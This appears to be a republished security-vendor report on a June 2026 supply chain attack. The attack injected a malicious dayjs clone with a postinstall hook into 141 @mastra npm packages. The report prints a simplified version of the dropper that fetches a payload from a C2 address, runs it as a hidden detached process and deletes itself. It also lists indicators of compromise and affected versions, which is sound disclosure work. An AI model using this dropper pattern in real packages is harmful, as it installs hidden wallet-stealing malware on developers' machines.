{"slug": "over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "title": "Over 140 popular Mastra npm Packages Hit by Supply Chain Attack", "summary": "A supply chain attack compromised over 140 npm packages in the @mastra scope, including @mastra/core with 918K weekly downloads, by injecting a malicious dependency that executes a postinstall script to deploy crypto wallet-stealing malware. The attack mirrors the March 2026 axios compromise, using a clean decoy version followed by a malicious update that fetches a second-stage payload from a Hostwinds C2 server targeting over 160 browser-based crypto wallet extensions.", "body_md": "On June 17th we detected a large-scale supply chain attack targeting the entire `@mastra` npm scope, a popular open-source AI agent framework. An attacker republished 141 packages in a burst between 01:15 and 02:00 UTC, silently injecting a malicious dependency into every one of them. The affected packages include `@mastra/core`, which has 918K weekly npm downloads, as well as `mastra` and `create-mastra`.\n\n## The postinstall script\n\nAll 141 packages had a single new dependency added to their `package.json`: `easy-day-js`, a malicious clone of the popular date library `dayjs`. The package was published by a separate attacker-controlled account a day before the scope takeover. Crucially, the initial release (1.11.21) was completely clean, a straight copy of `dayjs` with no install hooks. The malicious version (1.11.22) followed the next day, right around the time the `@mastra` packages were republished. 
The compromised packages depend on `^1.11.21`, but npm's caret resolution automatically pulls in the malicious 1.11.22 as the latest matching version, while auditing the version named in `package.json` (1.11.21) reveals nothing suspicious.\n\nVersion 1.11.22 adds a `postinstall` hook that runs `setup.cjs`, an obfuscated script that executes automatically at install time without any user interaction.\n\n```js\n// obfuscated -- stripped down to the essential logic\nconst payload = await (await fetch('https://23[.]254[.]164[.]92:8000/update/49890878')).text();\nconst file = path.join(os.tmpdir(), crypto.randomBytes(12).toString('hex') + '.js');\nfs.writeFileSync(file, payload, 'utf8');\nchild_process.spawn(process.execPath, [file, '23[.]254[.]164[.]123:443'], {\n  detached: true, stdio: 'ignore', windowsHide: true\n}).unref();\nfs.rmSync(__filename, { force: true }); // self-deletes\n```\n\nWhat this script does, step by step:\n\n- Fetches a second-stage payload from the C2 server at `23[.]254[.]164[.]92:8000`\n- Writes the payload to a randomly named `.js` file in the OS temp directory\n- Spawns the payload as a fully detached background process, invisible on all platforms (`stdio: 'ignore', windowsHide: true`), passing a second C2 host `23[.]254[.]164[.]123:443` as an argument\n- Self-deletes to remove forensic evidence of the postinstall hook\n\nThe second stage runs as a long-lived background process that collects system information and targets over 160 browser-based crypto wallet extensions, including MetaMask, Keplr, Coinbase, and more. It establishes persistence by disguising itself as node-related tools on macOS, Windows, and Linux, all phoning home to `23[.]254[.]164[.]123:443`.\n\n## Similarities with the axios compromise\n\nThe playbook here is nearly identical to the [axios compromise](https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat) we covered in March 2026. 
In both attacks, the attacker avoided touching the target package's own code and instead injected a malicious dependency, relying on npm's `postinstall` hook to execute the payload automatically at install time. Both staged a clean decoy version first, then followed with the malicious one. In the axios attack, `plain-crypto-js` played the role that `easy-day-js` plays here. Both droppers also self-delete after execution to remove forensic evidence.\n\nThe infrastructure also follows the same pattern. The axios dropper called back to a Hostwinds VPS on port 8000. The `easy-day-js` dropper does the same, hitting `23[.]254[.]164[.]92:8000` on Hostwinds infrastructure.\n\n## How Aikido detects this\n\nIf you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.\n\nIf you are not yet an Aikido user, you can [create an account](https://app.aikido.dev/login) and connect your repos. Our malware coverage is included in the free plan, no credit card required.\n\nFor broader coverage across your whole team, Aikido's [Device Protection](https://www.aikido.dev/protect/device-protection) gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.\n\nFor future protection, consider [Aikido Safe Chain](https://github.com/AikidoSec/safe-chain) (open source). 
Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against [Aikido Intel](https://intel.aikido.dev/) before install.\n\n## Indicators of Compromise\n\n**Network indicators**\n\n`23[.]254[.]164[.]92:8000` — first-stage C2, payload download\n\n`23[.]254[.]164[.]123:443` — second-stage callback host, passed to the spawned RAT\n\n**Affected packages**\n\neasy-day-js@1.11.22\n\ncreate-mastra@1.13.1\n\nmastra@1.13.1\n\n@mastra/acp@0.2.2\n\n@mastra/agent-browser@0.3.2\n\n@mastra/agent-builder@1.0.42\n\n@mastra/agentcore@0.2.2\n\n@mastra/agentfs@0.1.1\n\n@mastra/ai-sdk@1.4.6\n\n@mastra/arize@1.2.3\n\n@mastra/arthur@0.3.3\n\n@mastra/astra@1.0.2\n\n@mastra/auth@1.0.3\n\n@mastra/auth-auth0@1.0.2\n\n@mastra/auth-better-auth@1.0.4\n\n@mastra/auth-clerk@1.0.3\n\n@mastra/auth-cloud@1.1.4\n\n@mastra/auth-firebase@1.0.1\n\n@mastra/auth-okta@0.0.5\n\n@mastra/auth-studio@1.2.4\n\n@mastra/auth-supabase@1.0.2\n\n@mastra/auth-workos@1.5.3\n\n@mastra/azure@0.2.3\n\n@mastra/blaxel@0.4.2\n\n@mastra/braintrust@1.1.4\n\n@mastra/brightdata@0.2.2\n\n@mastra/browser-firecrawl@0.1.1\n\n@mastra/browser-viewer@0.1.3\n\n@mastra/chroma@1.0.2\n\n@mastra/claude@1.0.3\n\n@mastra/clickhouse@1.10.1\n\n@mastra/client-js@1.24.1\n\n@mastra/cloud@0.1.24\n\n@mastra/cloudflare@1.4.2\n\n@mastra/cloudflare-d1@1.0.7\n\n@mastra/codemod@1.0.4\n\n@mastra/convex@1.2.2\n\n@mastra/core@1.42.1\n\n@mastra/couchbase@1.0.4\n\n@mastra/cursor@0.2.1\n\n@mastra/dane@1.0.2\n\n@mastra/datadog@1.2.5\n\n@mastra/daytona@0.4.2\n\n@mastra/deployer@1.42.1\n\n@mastra/deployer-cloud@1.42.1\n\n@mastra/deployer-cloudflare@1.1.44\n\n@mastra/deployer-netlify@1.1.20\n\n@mastra/deployer-vercel@1.1.38\n\n@mastra/docker@0.3.1\n\n@mastra/dsql@1.0.3\n\n@mastra/duckdb@1.4.3\n\n@mastra/dynamodb@1.0.9\n\n@mastra/e2b@0.3.4\n\n@mastra/editor@0.11.3\n\n@mastra/elasticsearch@1.2.1\n\n@mastra/engine@0.1.1\n\n@mastra/evals@1.3.1\n\n@mastra/express@1.3.31\n\n@mastra/fastembed@1.1.3\n\n@ma
stra/fastify@1.3.31\n\n@mastra/files-sdk@0.2.1\n\n@mastra/gcs@0.2.3\n\n@mastra/github-signals@0.1.2\n\n@mastra/google-cloud-pubsub@1.0.6\n\n@mastra/google-drive@0.1.1\n\n@mastra/hono@1.4.26\n\n@mastra/inngest@1.5.2\n\n@mastra/koa@1.5.14\n\n@mastra/laminar@1.2.3\n\n@mastra/lance@1.0.7\n\n@mastra/langfuse@1.3.6\n\n@mastra/langsmith@1.2.4\n\n@mastra/libsql@1.13.1\n\n@mastra/loggers@1.1.3\n\n@mastra/longmemeval@1.0.50\n\n@mastra/mcp@1.10.1\n\n@mastra/mcp-docs-server@1.1.47\n\n@mastra/mcp-registry-registry@1.0.2\n\n@mastra/mem0@0.1.14\n\n@mastra/memory@1.20.4\n\n@mastra/modal@0.2.2\n\n@mastra/mongodb@1.9.3\n\n@mastra/mssql@1.3.2\n\n@mastra/mysql@0.1.1\n\n@mastra/nestjs@0.1.15\n\n@mastra/node-audio@0.1.8\n\n@mastra/node-speaker@0.1.1\n\n@mastra/observability@1.14.2\n\n@mastra/openai@1.0.2\n\n@mastra/opencode@0.0.47\n\n@mastra/opensearch@1.0.3\n\n@mastra/otel-bridge@1.2.3\n\n@mastra/otel-exporter@1.2.3\n\n@mastra/perplexity@0.1.1\n\n@mastra/pg@1.13.1\n\n@mastra/pinecone@1.0.2\n\n@mastra/playground-ui@33.0.1\n\n@mastra/posthog@1.0.29\n\n@mastra/qdrant@1.0.3\n\n@mastra/rag@2.2.2\n\n@mastra/railway@0.1.1\n\n@mastra/react@1.0.1\n\n@mastra/redis@1.1.3\n\n@mastra/redis-streams@0.0.4\n\n@mastra/s3@0.5.3\n\n@mastra/s3vectors@1.0.7\n\n@mastra/schema-compat@1.2.12\n\n@mastra/sentry@1.1.4\n\n@mastra/server@2.1.1\n\n@mastra/slack@1.3.1\n\n@mastra/spanner@1.1.2\n\n@mastra/speech-azure@0.2.1\n\n@mastra/speech-elevenlabs@0.2.1\n\n@mastra/speech-google@0.2.1\n\n@mastra/speech-ibm@0.2.1\n\n@mastra/speech-murf@0.2.1\n\n@mastra/speech-openai@0.2.1\n\n@mastra/speech-replicate@0.2.1\n\n@mastra/speech-speechify@0.2.1\n\n@mastra/stagehand@0.2.5\n\n@mastra/tavily@1.0.3\n\n@mastra/temporal@0.1.14\n\n@mastra/turbopuffer@1.0.3\n\n@mastra/twilio@1.0.2\n\n@mastra/upstash@1.1.3\n\n@mastra/vectorize@1.0.3\n\n@mastra/vercel@1.0.1\n\n@mastra/voice-aws-nova-sonic@0.1.4\n\n@mastra/voice-azure@0.11.2\n\n@mastra/voice-cloudflare@0.12.3\n\n@mastra/voice-deepgram@0.12.2\n\n@mastra/voice-elevenlabs@0.12.2\n\n@ma
stra/voice-gladia@0.12.2\n\n@mastra/voice-google@0.12.3\n\n@mastra/voice-google-gemini-live@0.12.2\n\n@mastra/voice-inworld@0.3.1\n\n@mastra/voice-modelslab@0.1.2\n\n@mastra/voice-murf@0.12.3\n\n@mastra/voice-openai@0.12.3\n\n@mastra/voice-openai-realtime@0.12.6\n\n@mastra/voice-playai@0.12.2\n\n@mastra/voice-sarvam@1.0.2\n\n@mastra/voice-speechify@0.12.2\n\n@mastra/voice-xai-realtime@0.1.2", "url": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "canonical_source": "https://www.aikido.dev/blog/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "published_at": "2026-06-17 08:43:00+00:00", "updated_at": "2026-06-17 10:00:13.375601+00:00", "lang": "en", "topics": ["ai-safety", "ai-tools", "ai-agents"], "entities": ["Mastra", "npm", "Aikido", "MetaMask", "Keplr", "Coinbase", "Hostwinds", "axios"], "alternates": {"html": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "markdown": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.md", "text": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.txt", "jsonld": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.jsonld"}}